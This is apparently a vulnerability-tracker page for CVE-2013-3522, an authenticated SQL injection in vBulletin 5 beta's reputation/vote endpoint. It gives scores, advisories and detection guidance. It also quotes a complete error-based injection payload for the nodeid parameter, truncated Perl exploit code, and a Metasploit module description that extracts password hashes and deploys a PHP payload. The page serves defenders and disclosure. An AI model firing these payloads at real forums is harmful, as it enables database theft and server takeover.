CVE-2013-3522
published 2013-05-10CVE-2013-3522: SQL injection vulnerability in index.php/ajax/api/reputation/vote in vBulletin 5.0.0 Beta 11, 5.0.0 Beta 28, and earlier allows remote authenticated users to…
PriorityP266medium6.5CVSS 2.0
AVNACLAuSCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
27.08%
97.8th percentile
SQL injection vulnerability in index.php/ajax/api/reputation/vote in vBulletin 5.0.0 Beta 11, 5.0.0 Beta 28, and earlier allows remote authenticated users to execute arbitrary SQL commands via the nodeid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbulletin | vbulletin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandnodeid=<id>) and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338↗
- →Monitor POST requests to 'index.php/ajax/api/reputation/vote' with a 'nodeid' parameter containing SQL metacharacters or subquery patterns (e.g., parentheses, SELECT, CONCAT, floor(rand())). A 'Database error in vBulletin' string in the HTTP 200 response body indicates successful blind/error-based SQLi. ↗
- →Detect exploitation chain: SQLi on /ajax/api/reputation/vote followed by login attempt to login.php with 'logintype=cplogin' and pre-computed MD5 hash fields ('vb_login_md5password'), then product import via admincp/product.php — this sequence indicates the full RCE exploit chain. ↗
- →Alert on multipart POST to admincp/product.php?do=productimport containing an XML file upload ('productfile' field) immediately after an admin login — this is the payload delivery step of the exploit. ↗
- →The PoC uses a User-Agent of 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0' for all exploit requests; correlate this UA with POST requests to the vulnerable endpoint. ↗
- →The error-based SQLi payload uses the pattern 'floor(rand(0)*2)' combined with GROUP BY to trigger a duplicate-key error; detect this pattern in POST body parameters targeting vBulletin endpoints. ↗
- →The exploit has been observed in the wild since March 2013; flag vBulletin 5.0.0 Beta 11 through Beta 28 installations as vulnerable during asset inventory. ↗
- ·The Metasploit module brute-forces valid node IDs between MINNODE (default 1) and MAXNODE (default 100); defenders should note that the SQLi requires a valid node ID to function, so environments with no public nodes in that range may reduce exploitability. ↗
- ·The exploit requires the attacker to be a remote authenticated user; unauthenticated exploitation is not indicated by the CVE description. ↗
- ·The RCE module (vbulletin_vote_sqli_exec) was tested specifically on vBulletin 5.0.0 Beta 13 on Ubuntu Linux; behavior on other OS/version combinations may differ. ↗
CVSS provenance
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hppw-jmc4-w4gv: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-17
CVE-2013-3522 [MEDIUM] CWE-89 GHSA-hppw-jmc4-w4gv: SQL injection vulnerability in index
SQL injection vulnerability in index.php/ajax/api/reputation/vote in vBulletin 5.0.0 Beta 11, 5.0.0 Beta 28, and earlier allows remote authenticated users to execute arbitrary SQL commands via the nodeid parameter.
VulnCheck
vBulletin vBulletin Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2013·CVSS 6.5
CVE-2013-3522 [MEDIUM] vBulletin vBulletin Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vBulletin vBulletin Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
SQL injection vulnerability in index.php/ajax/api/reputation/vote in vBulletin 5.0.0 Beta 11, 5.0.0 Beta 28, and earlier allows remote authenticated users to execute arbitrary SQL commands via the nodeid parameter.
Affected: vBulletin vBulletin
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.exploit-db.com/exploits/30212
No detection rules found.
Exploit-DB
vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)
exploitdb·2013-12-11
CVE-2013-3522 vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)
vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5 that has
been used in the wild since March 2013. This module uses the sqli to extract the
web application's usernames and hashes. With the retrieved information tries to
log into the admin control panel in order to deploy the PHP payload. This module
has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu
Linux distribution.
},
'Author'
Exploit-DB
vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection
exploitdb·2013-03-25
CVE-2013-3522 vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection
vBulletin 5.0.0 Beta 11 new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
[
'url' => $encpath,
'username' => $username,
'password' => $password,
],
Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from informati
Metasploit
vBulletin Password Collector via nodeid SQL Injection
metasploit
vBulletin Password Collector via nodeid SQL Injection
vBulletin Password Collector via nodeid SQL Injection
This module exploits a SQL injection vulnerability found in vBulletin 5 that has been used in the wild since March 2013. This module can be used to extract the web application's usernames and hashes, which could be used to authenticate into the vBulletin admin control panel.
Metasploit
vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection
metasploit
vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection
vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection
This module exploits a SQL injection vulnerability found in vBulletin 5 that has been used in the wild since March 2013. This module uses the sqli to extract the web application's usernames and hashes. With the retrieved information tries to log into the admin control panel in order to deploy the PHP payload. This module has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu Linux distribution.
No writeups or analysis indexed.
2013-05-10
Published
Exploited in the wild